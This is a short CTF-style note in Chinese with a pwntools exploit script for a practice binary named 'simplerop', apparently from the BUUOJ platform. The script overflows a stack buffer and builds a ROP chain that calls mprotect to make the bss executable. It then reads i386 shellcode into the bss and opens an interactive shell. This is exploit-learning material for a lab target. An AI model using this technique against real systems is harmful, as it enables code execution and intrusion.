关于mprotect可参考mprotect 静态链接的可执行文件,利用mprotect修改bss可执行,写入shellcode后跳转即拿到shell…
from pwn import * context.log_level = 'debug' proc_name = './simplerop' p = process(proc_name) # p = remote('node3.buuoj.cn', 25491) elf = ELF(proc_name) mprotect_addr = elf.sym['mprotect'] bss_start = elf.bss() & ~(elf.bss()% (4 * 1024)) read_addr = elf.sym['read'] rop = 0x0804838c # 主要是为了保持栈平衡将mprotect的三个参数弹栈 payload = b'a' * (0x1c + 0x4) + p32(mprotect_addr) + p32(rop) + p32(bss_start) + p32(0x400) + p32(0x7) + p32(read_addr) + p32(bss_start) + p32(0) + p32(bss_start) + p32(0x400) p.sendlineafter('input :', payload) p.sendline(asm(shellcraft.i386.sh())) p.interactive()